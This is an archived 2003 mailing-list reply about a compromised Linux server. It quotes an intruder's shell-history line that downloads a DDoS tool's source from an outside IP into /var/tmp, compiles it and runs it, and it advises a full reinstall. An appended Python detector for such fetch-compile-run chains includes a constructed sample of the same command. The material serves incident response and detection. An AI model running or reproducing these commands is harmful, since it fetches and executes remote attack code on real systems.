Mailinglist Archive: opensuse (4165 mails)

Re: [SLE] Help - Been Hacked!!
  • From: Jim Cunning <jcunning@xxxxxxx>
  • Date: Thu, 24 Apr 2003 13:19:30 -0700 (PDT)
  • Message-id: <Pine.LNX.4.44.0304241309000.11231-100000@xxxxxxxxxxxxxxx>
On Apr 24 at 12:45pm, Matt Stamm wrote:
[...]
> I checked .bash_history as you suggested and found
> an interesting entry. This entry was in
> .bash_history in the 'root' directory.
>
>
> cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget
> -O screen.c wget http://64.5.4.47/screen.c;export
> PATH=.:/usr/bin:$PATH;gcc -o screen screen.c
> -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
>
>
> I'm new at this but based on a little research am
> I correct in assuming an external someone
> downloaded screen.c into my /var/tmp directory,
> compiled it to /usr/bin and then ran it? Is this
> correct? I looked at the source for 'screen.c' and
> in the title it says...
>
> Peer-to-peer UDP Distributed Denial of Service
> (PUD) by contem
[...]

Matt,
It appears you're still investigating what happened to your system, and
that's fine, but.... I know you've gotten advice from a number of people
to the effect that if _part_ of your system has been compromised, then the
_whole_ system is suspect, and the only reasonable action is a complete
reinstall. It's very good advice.

Go ahead and gather all the evidence you want, but save yourself some
trouble and future uncertainty and reinstall. Don't try to patch the
problem--you'll never know if you got everything.

Jim
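
Added example, not part of either message above: while gathering evidence before the reinstall, a small Python check like this can flag shell-history entries that chain a move into a world-writable temp directory, a download, a compile and a run of the freshly built binary, which is the shape of the entry quoted above. The function names, stage labels and the sample line (placeholder file name, documentation-range address) are constructed for illustration.

```python
import re
import shlex

TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable staging dirs
CHAIN = {"tmp_dir", "download", "compile", "run_built"}

def analyze_history_line(line):
    """Return the stages of a fetch-compile-run chain seen in one history entry."""
    stages, built, dot_first = set(), set(), False
    for cmd in re.split(r"[;&|]+", line):
        try:
            argv = shlex.split(cmd)
        except ValueError:            # unbalanced quotes: plain whitespace split
            argv = cmd.split()
        if argv and argv[0] == "export":
            argv = argv[1:]
        if not argv:
            continue
        name = argv[0]
        if name == "cd" and len(argv) > 1:
            if argv[1].rstrip("/") in TMP_DIRS:
                stages.add("tmp_dir")
        elif name in ("wget", "curl") and any("://" in a for a in argv):
            stages.add("download")
        elif name.startswith("PATH="):
            # "." or an empty first entry makes bare names resolve to the cwd
            if name[5:].split(":")[0] in (".", ""):
                dot_first = True
                stages.add("path_dot")
        elif name in ("gcc", "cc", "g++") and "-o" in argv[:-1]:
            built.add(argv[argv.index("-o") + 1])
            stages.add("compile")
        else:
            local = name.startswith("./")
            target = name[2:] if local else name
            if target in built and (local or dot_first):
                stages.add("run_built")
    return stages

def is_fetch_compile_run(line):
    """True when every stage of the chain appears in the same entry."""
    return CHAIN <= analyze_history_line(line)

# Constructed sample (placeholder file name and documentation-range address).
SAMPLE = (r'cd /var/tmp;if [ -f tool.c ];then(exit);fi;wget -O tool.c '
          r'http://192.0.2.10/tool.c;export PATH=.:/usr/bin:$PATH;'
          r'gcc -o tool tool.c -DEXTERNAL_BASE="\"192.0.2.10\"";tool;exit;')

if __name__ == "__main__":
    print(sorted(analyze_history_line(SAMPLE)), is_fetch_compile_run(SAMPLE))
```

A clean history proves nothing, since an intruder with root can edit or truncate it, so a hit is evidence to preserve and a miss is not a reason to skip the reinstall.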

